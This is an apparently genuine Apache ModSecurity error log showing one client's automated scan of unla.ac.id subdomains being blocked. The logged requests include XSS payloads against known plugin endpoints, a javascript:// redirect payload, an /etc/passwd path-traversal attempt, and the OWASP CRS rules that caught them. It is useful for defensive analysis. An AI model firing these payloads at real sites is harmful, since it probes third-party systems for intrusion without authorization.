[Tue Aug 29 11:57:26.160575 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tsCo-f0AAArePKcAAAAJ"]
[Tue Aug 29 11:57:26.162828 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tsCo-f0AAAocyr8AAAAR"]
[Tue Aug 29 11:57:26.183610 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tsCo-f0AAAocysAAAAAR"]
[Tue Aug 29 11:57:26.227582 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tsCo-f0AAArLLjYAAAAb"]
[Tue Aug 29 11:57:26.708643 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tsCo-f0AAArePLEAAAAJ"]
[Tue Aug 29 11:57:26.917417 2023] [:error] [pid 2786] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tsCo-f0AAAriwgYAAAAK"]
[Tue Aug 29 11:57:27.556457 2023] [:error] [pid 2786] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16t8Co-f0AAAriwgkAAAAK"]
[Tue Aug 29 11:57:27.559412 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16t8Co-f0AAArePLkAAAAJ"]
[Tue Aug 29 11:57:27.559682 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16t8Co-f0AAAqsWEcAAAAB"]
[Tue Aug 29 11:57:27.560858 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16t8Co-f0AAAocysoAAAAR"]
[Tue Aug 29 11:57:27.581638 2023] [:error] [pid 2786] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16t8Co-f0AAAriwgoAAAAK"]
[Tue Aug 29 11:57:28.637217 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16uMCo-f0AAAq@sp4AAAAM"]
[Tue Aug 29 11:57:30.533183 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16usCo-f0AAAocytUAAAAR"]
[Tue Aug 29 11:57:30.553039 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16usCo-f0AAArePM4AAAAJ"]
[Tue Aug 29 11:57:30.555494 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16usCo-f0AAAq@sqIAAAAM"]
[Tue Aug 29 11:57:30.556801 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16usCo-f0AAArdQkAAAAAI"]
[Tue Aug 29 11:57:30.557915 2023] [:error] [pid 2785] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/listing/"] [unique_id "ZO16usCo-f0AAArh0UUAAAAC"]
[Tue Aug 29 11:57:30.572613 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16usCo-f0AAArbWbcAAAAG"]
[Tue Aug 29 11:57:30.573024 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16usCo-f0AAAoz8hYAAAAS"]
[Tue Aug 29 11:57:30.574597 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16usCo-f0AAArePM8AAAAJ"]
[Tue Aug 29 11:57:30.583981 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16usCo-f0AAArLLkkAAAAb"]
[Tue Aug 29 11:57:30.604377 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/listing/"] [unique_id "ZO16usCo-f0AAArLLkoAAAAb"]
[Tue Aug 29 11:57:30.613162 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/listing/"] [unique_id "ZO16usCo-f0AAAoz8hgAAAAS"]
[Tue Aug 29 11:57:30.648236 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/listing/"] [unique_id "ZO16usCo-f0AAAq@sqUAAAAM"]
[Tue Aug 29 11:57:30.667034 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16usCo-f0AAAoz8hoAAAAS"]
[Tue Aug 29 11:57:30.727369 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/listing/"] [unique_id "ZO16usCo-f0AAAq@sqkAAAAM"]
[Tue Aug 29 11:57:30.748436 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16usCo-f0AAAoz8h4AAAAS"]
[Tue Aug 29 11:57:31.592619 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16u8Co-f0AAArLLlQAAAAb"]
[Tue Aug 29 11:57:31.666797 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16u8Co-f0AAArdQksAAAAI"]
[Tue Aug 29 11:57:31.682404 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/listing/"] [unique_id "ZO16u8Co-f0AAArLLlcAAAAb"]
